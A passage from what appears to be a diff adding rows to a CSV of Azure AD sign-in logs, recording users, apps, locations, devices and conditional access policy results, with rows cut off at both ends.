'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",13ab9514-e229-4755-99bf-dc8874b60c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,13ab9514-e229-4755-99bf-dc8874b60c00,SigninLogs,Sucess,50.6406517,5.572050095
+1317,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:04.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21d0ec9d-f4d9-40b2-b620-58cb9a4eff32,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d0efda67-c5f0-466a-9417-d05e09ad0b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,d0efda67-c5f0-466a-9417-d05e09ad0b00,SigninLogs,Sucess,50.6406517,5.572050095
+1318,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:06.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4885b5c5-efc2-4dce-9d3d-5253f53e95f5,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",dfda3bbc-b55b-4a89-a1fb-2fc045b50a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,dfda3bbc-b55b-4a89-a1fb-2fc045b50a00,SigninLogs,Sucess,50.6406517,5.572050095
+1319,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:58.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6d015e19-944d-4a40-abe5-ba6795158b68,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e9cfabe1-d666-446f-aeb7-58176d070d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,e9cfabe1-d666-446f-aeb7-58176d070d00,SigninLogs,Sucess,50.6406517,5.572050095
+1320,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:47.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5a052e7e-2284-4115-9ddd-003fceac0c00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5a052e7e-2284-4115-9ddd-003fceac0c00,SigninLogs,Sucess,33.0175209,35.44601059
+1321,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:02.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b758eb04-f3da-4f4f-8557-ead6472e790a,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5ef5316a-deee-4f03-8fd7-4abf6c960b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5ef5316a-deee-4f03-8fd7-4abf6c960b00,SigninLogs,Sucess,50.6406517,5.572050095
+1322,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:26.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dea3e331-4f84-45c5-bcda-91dcb804662d,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:37,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Chrome 80.0.3987', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",4b3528ee-92e3-408c-b8b8-e47b3dfa1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4b3528ee-92e3-408c-b8b8-e47b3dfa1300,SigninLogs,Sucess,29.4803009,-81.21395111
+1323,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:47.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:36,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",4f5563e9-cd91-4aaf-8dc5-b5ee9f960d00,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,4f5563e9-cd91-4aaf-8dc5-b5ee9f960d00,SigninLogs,Sucess,33.0175209,35.44601059
+1324,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,39:48.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,894d9eac-c56b-43b3-98e2-4612a20a89ad,Microsoft.aadiam,Microsoft.aadiam,,Yuri Diogenes,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': 